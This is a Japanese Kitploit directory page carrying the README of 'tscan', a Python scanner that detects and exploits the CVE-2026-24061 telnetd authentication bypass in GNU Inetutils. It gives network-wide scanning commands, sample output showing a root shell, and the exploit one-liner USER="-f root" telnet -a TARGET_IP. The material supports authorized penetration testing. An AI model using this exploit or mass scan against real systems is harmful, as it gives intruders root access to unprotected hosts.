Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
tscan — Pythonベースのスキャナで、CVE-2026-24061のtelnetd認証バイパスを検出・悪用し、脆弱なGNU Inetutilsサービス上でrootシェルアクセスを可能にします。 | Kitploit
ツール/GitHubGitHub/cumakurt/tscan
偵察脆弱性スキャナーポートスキャンエクスプロイトネットワークセキュリティペネトレーションテスト学習と教育
GitHubcumakurt/tscan

tscan

Pythonベースのスキャナで、CVE-2026-24061のtelnetd認証バイパスを検出・悪用し、脆弱なGNU Inetutilsサービス上でrootシェルアクセスを可能にします。

リポジトリを見る
187ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Telnetd 認証バイパススキャナー (CVE-2026-24061)

GNU Inetutils telnetd サービスにおける CVE-2026-24061 脆弱性を検出・悪用するための Python ベースのスキャナーです。このツールは、認証バイパスによる root シェルアクセスを許す脆弱な telnetd サービスを、IP アドレスまたはネットワークに対してスキャンします。


⚠️ 重要な法的通知および免責事項

本ソフトウェアは、教育目的および許可されたセキュリティテスト目的でのみ提供されます。

1. 教育目的

本アプリケーションは、セキュリティ脆弱性を実証し、許可されたセキュリティテストおよび研究を支援することを唯一の目的として開発されています。

2. 保証なし

本ソフトウェアは、明示または黙示を問わず、いかなる種類の保証もなく「現状のまま」提供されます。 商品性、特定目的への適合性、および非侵害の保証を含みますがこれらに限定されません。著作者および貢献者は、本ソフトウェアがエラーフリー、安全、または機能的であることを保証しません。 本ソフトウェアにはバグ、エラー、またはその他の欠陥が含まれる可能性があります。

3. 利用者の責任

本ソフトウェアの使用に関するすべての責任および法的責任は、完全に利用者に帰属します。 本ソフトウェアの著作者、貢献者、および配布者は、本ソフトウェアの使用、誤用、または使用不能に起因するいかなる損害、損失、または法的結果についても責任を負いません。

4. 不正使用の禁止

このツールは、所有しているシステム、または明示的な書面によるテスト許可を得たシステムに対してのみ使用する必要があります。コンピュータシステムへの不正アクセスは違法であり、刑事訴追の対象となる可能性があります。

5. 保証なし

著作者は以下を保証しません:

  • スキャン結果の正確性
  • アプリケーション自体のセキュリティ
  • すべてのシステムとの互換性
  • バグやエラーの不存在
  • 特定の機能やパフォーマンス

本ソフトウェアを使用することにより、お客様はこれらの条項を読み、理解し、拘束されることに同意したものとみなされます。同意しない場合は、本ソフトウェアを使用しないでください。


開発者

開発者: Cuma KURT
メール: [email protected]
LinkedIn: https://www.linkedin.com/in/cuma-kurt-34414917/

脆弱性情報

CVE-2026-24061: バージョン 2.7 までの GNU Inetutils telnetd は、USER 環境変数に -f root 値を指定することでリモートからの認証バイパスを許可します。

CVSS スコア: 9.8 (Critical)

参照: NVD CVE-2026-24061

機能

  • 🔍 ポートスキャン: オープンな telnet ポートを検出します (デフォルト: 23、カスタマイズ可能)
  • 🎯 脆弱性検出: CVE-2026-24061 の悪用可能性をテストします
  • ⚡ マルチスレッド: 設定可能なスレッド数による高速な並行スキャン
  • 📁 柔軟な入力: IP アドレス、CIDR ネットワーク、ファイルベースのターゲットリストをサポート
  • 🗺️ 自動検出: ルーティングテーブルからサブネットを自動検出してスキャン
  • 🛑 安全な割り込み: Ctrl+C でスキャンを安全に停止し、部分的な結果を表示
  • 📊 リアルタイム進行状況: 統計情報と発見結果付きのプログレスバー

インストール

前提条件

  • Python 3.6 以上
  • telnet クライアント (通常 Linux/macOS にプリインストールされています)

依存関係のインストール

root@kitploit:~
pip3 install -r requirements.txt

注記: ほとんどの依存関係は Python 標準ライブラリの一部です。このツールは Python 3.6+ でそのまま動作します。

使用方法

基本的な使用方法

root@kitploit:~
# 単一の IP アドレスをスキャン
python3 tscan.py 192.168.1.1

# CIDR ネットワークをスキャン
python3 tscan.py 192.168.1.0/24

# カスタムポートでスキャン
python3 tscan.py -p 2323 192.168.1.1

# ファイルからターゲットをスキャン
python3 tscan.py targets.txt

# 複数の IP アドレスをスキャン
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1

# 複数の CIDR ネットワークをスキャン
python3 tscan.py 192.168.1.0/24 10.0.0.0/16

パフォーマンスチューニング

root@kitploit:~
# 高速スキャンのためにスレッド数を増やす (100 スレッド)
python3 tscan.py -t 100 192.168.1.0/24

# 低速ネットワーク向けにタイムアウトを増やす
python3 tscan.py --timeout 10 192.168.1.0/24

# 大規模ネットワークスキャンでは両方を組み合わせる
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16

自動検出モード

root@kitploit:~
# システムのルーティングテーブルからすべてのサブネットを自動検出してスキャン
python3 tscan.py --auto
# または短縮形:
python3 tscan.py -a

# カスタムポートで自動検出
python3 tscan.py --auto -p 2323
# または:
python3 tscan.py -a -p 2323

# 高スレッド数で自動検出
python3 tscan.py --auto -t 200
# または:
python3 tscan.py -a -t 200

注記: --auto モードは、ip route list または route -n コマンドを使用してシステムのルーティングテーブルを読み取り、検出されたすべてのサブネットを自動的にスキャンします。

実世界の例

root@kitploit:~
# 例 1: ローカルネットワークのクイックスキャン
python3 tscan.py 192.168.1.0/24

# 例 2: 高並行性による高速スキャン
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16

# 例 3: 非標準の telnet ポートをスキャン
python3 tscan.py -p 2323 192.168.1.0/24

# 例 4: すべてのローカルネットワークサブネットを自動検出してスキャン
python3 tscan.py --auto
# または:
python3 tscan.py -a

# 例 5: カスタム設定で自動検出
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# または:
python3 tscan.py -a -p 2323 -t 100 --timeout 8

コマンドラインオプション

root@kitploit:~
positional arguments:
  targets               IP アドレス、CIDR ネットワーク、またはターゲットを含むファイルパス

options:
  -h, --help            このヘルプメッセージを表示して終了
  -p, --port PORT       スキャンする Telnet ポート (デフォルト: 23)
  -t, --threads THREADS 同時スレッド数 (デフォルト: 50)
  --timeout TIMEOUT     接続タイムアウト (秒) (デフォルト: 5)
  -v, --verbose         詳細出力
  -a, --auto            システムのルーティングテーブル (route -n または ip route list) からすべてのサブネットを自動検出してスキャン

入力ファイル形式

1 行に 1 ターゲットを記述したテキストファイルを作成します:

root@kitploit:~
192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16

# で始まる行はコメントとして扱われ、無視されます。

出力

このツールは以下を提供します:

  1. リアルタイム進行状況: 発見された結果をリアルタイムで表示

    • パーセンテージと統計情報付きのプログレスバー
    • プログレスバーに脆弱なホスト数が表示されます
    • [!] - 脆弱なホスト
    • [~] - ポートはオープンだが脆弱ではない
    • ポートがクローズしているターゲットは静かにスキップされます
    • Ctrl+C (KeyboardInterrupt): スキャンを安全に中断し、部分的な結果を即座に表示します
  2. サマリーレポート: 以下を含みます:

    • 検出された telnet サービスの総数
    • 脆弱なホストの数
    • 脆弱なホストの詳細リスト

出力例

基本的なスキャン出力

root@kitploit:~
[*] 256 ターゲットのスキャンを開始...
[*] ポート: 23、スレッド: 50、タイムアウト: 5 秒

[*] 進行状況: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | オープン: 2 | 脆弱: 1
[!] 192.168.1.100:23 - 脆弱
[*] 進行状況: [████████████████████████████████████] 100.0% (256/256) | オープン: 3 | 脆弱: 1
[+] スキャン完了: 256/256 ターゲットをスキャンしました

======================================================================
スキャン結果サマリー
======================================================================

検出された Telnet サービス: 3
脆弱なホスト: 1

[!] 脆弱なホスト:

  ● 192.168.1.100:23
    出力: uid=0(root) gid=0(root) groups=0(root)...

[~] 検出されたが脆弱ではない Telnet サービス:

  ● 192.168.1.101:23
  ● 192.168.1.102:23

[*] スキャンは 12.34 秒で完了しました

動作原理

  1. ポート検出: ターゲット IP の telnet ポートがオープンかどうかを確認します
  2. 悪用試行: オープンポートに対して CVE-2026-24061 エクスプロイトを試行します:
    • USER="-f root" 環境変数を設定
    • telnet -a コマンドで接続
    • root シェルアクセスを確認するためのテストコマンドを送信
  3. 結果の分類: 結果を脆弱または非脆弱に分類します

エクスプロイトの詳細

この脆弱性は、USER 環境変数を -f root に設定することで認証バイパスを可能にします:

root@kitploit:~
USER="-f root" telnet -a TARGET_IP [PORT]

これにより telnetd は USER 変数をフラグとして解釈し、認証をバイパスして root アクセスを許可します。

制限事項

  • telnet クライアントのインストールが必要です
  • 脆弱な telnetd バージョン (≤ 2.7) に対してのみ動作します
  • 自動検出モードには ip route list または route -n コマンドが必要です

トラブルシューティング

「telnet コマンドが見つかりません」

telnet クライアントをインストールします:

root@kitploit:~
# Debian/Ubuntu
sudo apt-get install telnet

# CentOS/RHEL
sudo yum install telnet

# macOS
# 通常はプリインストールされています

結果が見つからない場合

  • ターゲットが到達可能かどうかを確認します
  • ファイアウォールルールを確認します
  • telnet サービスが実際に実行されていることを確認します
  • タイムアウトを増やしてみてください: --timeout 10

法的および倫理的使用

このツールは以下を目的としています:

  • ✅ 許可された侵入テスト
  • ✅ 自身のシステムに対するセキュリティ研究
  • ✅ 適切な許可を得た脆弱性評価
  • ✅ 管理された環境での教育目的

このツールを以下の目的で使用しないでください:

  • ❌ システムへの不正アクセス
  • ❌ 違法なハッキング活動
  • ❌ 明示的な許可のないいかなる活動

参照

  • CVE-2026-24061 の詳細
  • SafeBreach Labs の分析

ライセンス

このプログラムはフリーソフトウェアです。フリーソフトウェア財団によって発行された GNU 一般公衆利用許諾書 (GPL) バージョン 3、または (お客様の選択により) それ以降のバージョンの条項に基づいて、再配布および/または変更することができます。

このプログラムは有用であることを期待して配布されていますが、いかなる保証もありません。 商品性または特定目的への適合性に関する暗黙の保証もありません。詳細については、GNU 一般公衆利用許諾書を参照してください。

このプログラムとともに GNU 一般公衆利用許諾書のコピーを受け取っているはずです。受け取っていない場合は、https://www.gnu.org/licenses/ を参照してください。

完全なライセンステキスト

完全な GNU 一般公衆利用許諾書 v3.0 のテキストについては、LICENSE ファイルを参照してください。

免責事項

著作者および貢献者は、このツールによって引き起こされた誤用または損害について一切責任を負いません。

このツールは教育目的および許可されたセキュリティテスト目的でのみ提供されます。

自己責任で使用してください。 本ソフトウェアの使用に関するすべての責任および法的責任は、完全に利用者に帰属します。著作者は、本ソフトウェアの正確性、セキュリティ、または機能性を保証しません。本ソフトウェアは、いかなる種類の保証もなく「現状のまま」提供されます。

本アプリケーションは教育目的のみで開発されています。 本ソフトウェアを使用することにより、お客様は以下を了承したものとみなされます:

  • これが教育用ツールであることを理解していること
  • その使用に関するすべての責任はお客様にあること
  • 著作者は保証や保証を一切提供しないこと
  • 所有しているシステム、または明示的な書面によるテスト許可を得たシステムに対してのみ使用すること
  • 不正使用は違法であり、刑事訴追の対象となる可能性があること

これらの条項に同意しない場合は、本ソフトウェアを使用しないでください。

ツールをダウンロード